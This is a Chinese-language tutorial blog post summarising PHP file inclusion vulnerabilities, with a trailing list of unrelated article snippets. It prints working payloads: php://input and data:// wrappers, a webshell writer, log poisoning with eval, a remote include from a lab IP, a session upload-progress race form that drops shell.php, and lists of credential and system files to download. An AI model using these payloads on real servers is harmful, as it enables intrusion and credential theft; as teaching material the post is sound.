文件包含漏洞汇总

news2024/11/13 6:42:29

文章目录

  • 原理
  • 文件包含函数
  • 伪协议函数
  • 本地包含
      • file协议
      • filter协议
      • input协议
      • data协议
  • 远程文件包含
      • 条件
      • http协议
  • 日志文件绕过
      • 概念
      • 日志路径
      • 复现
  • 文件包含之条件竞争
      • 概念
      • 靶场介绍
      • 复现
  • 文件下载
        • 文件下载常见的目录
          • 系统目录
            • linux
            • windows
          • 程序配置文件
            • apache
            • nginx
            • redis
        • 目录遍历与目录穿越的区别

原理

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为文件包含。在包含文件的过程中,如果文件能进行控制,则存储文件包含漏洞

文件包含函数

  • 白盒

    • php:include,require,include_once,require_once,file_put_contents

      • include函数在包含的过程中如果出现错误,就会抛出一个警告,程序继续运行
      • require函数出现错误的时候,会直接报错并退出程序的执行
      • file_put_contents(a,b)将b覆盖a
    • java:java.io.file,java.io.filereader等

    • asp .net: system.io.filestream, system.io.streamreader等

  • 黑盒

    • url中有path,dir,file,pag,page,asrchive,p,eng等相关字眼

伪协议函数

本地包含

  1. file协议

    1. payload:
      ?file=user.txt

  2. filter协议

    1. payload:

      http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=user.txt
      
  3. input协议

    1. payload

      get:http://127.0.0.1/include.php?file=php://input //如果file过滤php,可以写Php
      poet:<?php phpinfo();?>
      木马写入:<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd])?>')?>
      
  4. data协议

    1. payload

      http://127.0.0.1/include.php?file=data://text/plain,<?php phpinfo();?>
      

    2. payload

      http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
      //base64后面的符号要url编码1
      

远程文件包含

  1. 条件

  2. http协议

    1. payload:

      http://127.0.0.1/include.php?file=http://43.139.186.80/1.txt
      

日志文件绕过

  1. 概念

    1. 我们访问每一个网站都会有日志留在服务器,这些日志消息通常会包含usergent头,这样我们就可以通过对usergent头传入恶意数据然后通过文件包含漏洞进行解析即可绕过
  2. 日志路径

    1. apache: /var/log/apache/access.log
    2. nginx: /var/log/nginx/access.log 和 /var/log/nginx/error.log
  3. 复现

    1. 随便访问,捉包,在usergent后面插入木马

      1.   <?php eval($_REQUEST['cmd']);?>
        
    2. 通过文件包含包含日志文件即可,?file=/var/log/nginx/access.log

文件包含之条件竞争

  1. 概念

    1. 通常一个session建立是会被session锁定机制进行锁住,防止多个并发请求同时修改session数据,这个漏洞的原理是利用了PHP_SESSION_UPLOAD_PROGRESS 特性,当 PHP 处理文件上传请求时,会短暂解锁会话文件,允许并发请求访问,攻击者利用这个窗口,发送包含恶意 PHP_SESSION_UPLOAD_PROGRESS 字段的请求来达到任意命令执行的目的
  2. 靶场介绍

    1. 网站

      网站:http://43.139.186.80/1.php
      <?php
      if (isset($_GET['file'])) {
          $file = $_GET['file'];
      //    $file = str_replace("php", "???", $file); 
          $file = str_replace("data", "???", $file); 
      //    $file = str_replace(":", "???", $file); 
          $file = str_replace(".", "???", $file); 
          include($file);
      } else {
          highlight_file(__FILE__);
      }
      ?>
      攻击者的网站:
      <!DOCTYPE html>
      <html>12
      <body>
      <form action="http://43.139.186.80/1.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd])?>')?>" />
      <input type="file" name="file" />
      <input type="submit" value="submit" />
      </form>
      </body>
      </html>
      <?php
      session_start();
      ?>
      //记得form表单更换为上面的为受害者网站,value值为执行函数,目的是在当前网站下创建一个新的木马shell.php
      
  3. 复现

    1. 攻击者在自己的网站中上传任意文件,捉包,放到攻击者模块

    2. 在数据包中添加cookie和session字段

    3. 攻击模块配置如下

    4. 在进行访问缓存文件的数据包,http://43.139.186.80/1.php?file=C:\phpstudy_pro\Extensions\tmp\tmp\sess_exp,路径可以在phpinfo中的session.save_path值中找到,名称是sess_+你刚才写的名称,捉包,攻击模块配置和上面一样

    5. 同时发包,看返回的数据长度,出现数值不同说明攻击成功

文件下载

  • 文件下载常见的目录
    • 系统目录
      • linux
        • /etc/passwd
                  //保存了系统中所有的用户信息
          
          /etc/shadow
                  //用户的密码信息
          
          /root/.ssh/authorized_keys
                  //公钥文件
          
          /root/.bash_history
                  //用户终端操作历史记录
          
          /usr/local/app/apache2/conf/httpd.conf
                  //apache2默认配置文件
          
          /usr/local/app/apache2/conf/extra/httpd-vhosts.conf
                  //虚拟网站设置
          
          /usr/local/app/php5/lib/php.ini
                  //php相关设置
          
          /etc/httpd/conf/httpd.conf
                  //apache
          
          /etc/php5/apache2/php.ini
                  //ubuntu系统的默认路径
          
      • windows
        • C:\boot.ini
                  //查看系统版本
          
          C:\windows\system32\inetsrv\MetaBase.xml
                  //查看IIS虚拟主机配置文件
          
          C:\windows\repair\sam
                  //存储Windows系统初次安装的密码
          
          C:\Program Files\mysql\my.ini
                  //mysql配置,记录管理员登陆过的MYSQL用户名和密码
          
          C:\Program Files\mysql\data\mysql\user.MYD
                  //mysql.user表中的数据库连接密码
          
          C:\windows\php.ini php.ini
                  //php配置文件
          
          C:\Windows\system.in
                  //winnt的php配置信息
          
          C:\Windows\win.ini
                  //winnt的mysql配置文件
          
          C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
                  //存储虚拟主机网站路径和密码
          
          C:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf
                  //查看WINDOWS系统apache文件
          
          C:/Resin-3.0.14/conf/resin.conf
                  //查看jsp开发的网站resin文件配置信息.
          
          C:\Windows\System32\drivers\etc\hostswinserver
                  //配置Telnet信息
          
    • 程序配置文件
      • apache
        • /etc/httpd/conf/httpd.conf
          /etc/apache2/httpd.conf
          /etc/apache2/apache2.conf
          
      • nginx
        • /etc/nginx/nginx.conf
          /usr/local/nginx/conf/nginx.conf
          /usr/local/etc/nginx/nginx.conf
          
      • redis
        • /etc/redis.conf
          
  • 目录遍历与目录穿越的区别
    • 目录遍历是指获取所有或单个网站目录结构

      • 在这里插入图片描述
    • 而目录穿越是指在本来的文件中返回到上一级文件夹中

      *在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1970432.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【STL专题】深入探索vector:动态数组的魔力【入门指南】

欢迎来到 CILMY23 的博客 &#x1f3c6;本篇主题为&#xff1a;深入探索vector&#xff1a;动态数组的魔力&#xff0c;入门指南 &#x1f3c6;个人主页&#xff1a;CILMY23-CSDN博客 &#x1f3c6;系列专栏&#xff1a;Python | C | C语言 | 数据结构与算法 | 贪心算法 | L…

结构体指针数组函数综合应用改写选票系统

第一次写百行的代码 有点吃不消 感受到程序员的不容易 其中遇到了很多问题 希望分享给大家 下面是是完整的且完善的代码 #include<stdio.h> #include<string.h> #include <stdlib.h> //定义结构体 struct XuanMin {char name[32];int tickets; }; //指针函…

1-4章节复习总结

1-4章节总结 章节重点回顾-第一章-中央处理单元练习题 章节重点回顾-第一章-进制章节重点回顾-第一章-校验码奇偶校验码CRC循环冗余校验码海明码练习题 多草节重点回顾-第一草-计算机体系结构分类章节重点回顾-第一章-计算机指令练习题 章节重点回顾-第一章-指令流水线练习题 章…

​​​​​Tomcat部署及优化

&#x1f49d;&#x1f49d;&#x1f49d;欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里可以感受到一份轻松愉快的氛围&#xff0c;不仅可以获得有趣的内容和知识&#xff0c;也可以畅所欲言、分享您的想法和见解。 推荐:Linux运维老纪的首页…

洞见新能源汽车产业更智能的未来

新能源汽车行业进入智能化时代&#xff0c;除了备受关注的无人驾驶领域&#xff0c;新能源汽车在智能化的进程逐渐加快。智能化已成为中国汽车品牌的竞争力。 作为专业提供算网的服务商之一&#xff0c;VERYCLOUD睿鸿股份跟随新能源汽车行业快速变化&#xff0c;受邀前往CIAS 2…

天环公益首次推出原创开发进度网站,配备后台管理系统

天环公益组织近期创新性地发布了一个专用于监控与展示项目开发进程的官方网站&#xff0c;该网站特色在于其自研的后台管理系统。 对于有兴趣深入了解或参与管理的用户&#xff0c;可直接访问后台页面&#xff0c;入口为&#xff1a;admin.php。 值得注意的是&#xff0c;当前…

教育教学质量评测系统开发之软件技术分析

开发教学质量评测系统它不仅能够有效提升教育管理的科学性与透明度&#xff0c;还能精准反映教学过程中的问题与亮点&#xff0c;为教育决策提供坚实的数据支持。通过该系统&#xff0c;学校能够全面、客观地收集学生、教师及家长的反馈意见&#xff0c;促进教学相长&#xff0…

java各种锁有什么区别

Java 虚拟机&#xff08;JVM&#xff09;中有几种不同类型的锁&#xff0c;每种锁都有其特定的用途和性能特点。下面我将为你介绍几种常见的锁&#xff1a; 1.独占锁&#xff08;也称为悲观锁&#xff09;&#xff1a; 1.synchronized&#xff1a;这是 Java 提供的一种内置的独…

【数据结构】——栈和队列的实现(赋源码)

在前面我们已经学过顺序表以及单链表、双向表链的实现都是一种线性表&#xff0c;这里可以我们介绍栈和队列——是具有特殊化的线性表 栈 栈的概念以及结构 栈&#xff1a;⼀种特殊的线性表&#xff0c;其只允许在固定的⼀端进⾏插入和删除元素操作。进⾏数据插⼊和删除操作的…

Docker镜像的手动制作commit

目录 一、docker镜像说明 1.1 Docker镜像中有没有内核 1.2 为什么没有内核 1.3 容器中的程序后台运行会导致此容器启动后立即退出 1.4 Docker镜像的生命周期 1.5 制作镜像方式 二、 将现有容器通过docker commit手动构建镜像 2.1 基于容器手动制作镜像步骤 2.2 实战案…

【卷积神经网络】池化层【计算和python代码】

文章目录 1、简介2、池化层计算3、Stride4、Padding5、多通道池化计算6、数学公式⭐7、PyTorch 池化 API 使用7.1、形状调整7.2、最大和平均池化7.3、调整stride步长7.4、padding填充7.5、多通道池化7.6、完整代码⭐ 8、小结 &#x1f343;作者介绍&#xff1a;双非本科大三网络…

[Docker][Docker NetWork][上]详细讲解

目录 1.为什么需要网络管理2.Docker 网络架构简介0.铺垫说明1.CNM2.Libnetwork3.驱动 3.常见网络类型1.bridge 网络2.host 网络3.container 网络4.none 网络5.overlay 网络 1.为什么需要网络管理 容器的网络默认与宿主机及其他容器都是相互隔离&#xff0c; 但同时也要考虑以下…

Node污染 (Node.js)

&#x1f3bc;个人主页&#xff1a;金灰 &#x1f60e;作者简介:一名简单的大一学生;易编橙终身成长社群的嘉宾.✨ 专注网络空间安全服务,期待与您的交流分享~ 感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持&#xff01;❤️ &#x1f34a;易编橙终身成长社群&#…

C语言指针(Pointer)

指针与底层硬件联系紧密&#xff0c;使用指针可操作数据的地址&#xff0c;实现数据的间接访问 问题&#xff1a;这好好的一个变量&#xff0c;我定义完之后为啥不用它名字直接访问呢&#xff1f;我非要用间接访问&#xff0c;这不没事找事吗&#xff1f; 为什么需要指针? …

18.C语言函数相关练习题2

函数相关练习题2 1.不同班级的平均分2.二维数组和函数的概念3.外部变量和全局变量4.全局变量的例子5.输入10个数&#xff0c;找出最大数及最大数的下标 1.不同班级的平均分 #include <stdio.h>void inityarry(int arr[],int len){int i;for(i0;i<len;i){printf("…

【第八天】DNS及其查询过程

DNS及其查询过程 什么是DNS&#xff1f; 一般我们的主机&#xff0c;服务器都有一个ip地址&#xff0c;例如10.10.10.1。在计算机层面&#xff0c;如果我们要发送请求的话&#xff0c;首先就要知道我们的目标&#xff0c;也就是对方的ip地址。而IP地址很难记&#xff0c;比如…

初学者编程指南:方法与资源推荐

一、引言 编程已成为当代大学生的必备技能&#xff0c;但面对众多编程语言和学习资源&#xff0c;新生们常常感到迷茫。如何选择适合自己的编程语言&#xff1f;如何制定有效的学习计划&#xff1f;如何避免常见的学习陷阱&#xff1f;编程不仅是技术领域的一项基本技能&#…

H.264编码中的16x16宏块分析

&#x1f60e; 作者介绍&#xff1a;欢迎来到我的主页&#x1f448;&#xff0c;我是程序员行者孙&#xff0c;一个热爱分享技术的制能工人。计算机本硕&#xff0c;人工制能研究生。公众号&#xff1a;AI Sun&#xff08;领取大厂面经等资料&#xff09;&#xff0c;欢迎加我的…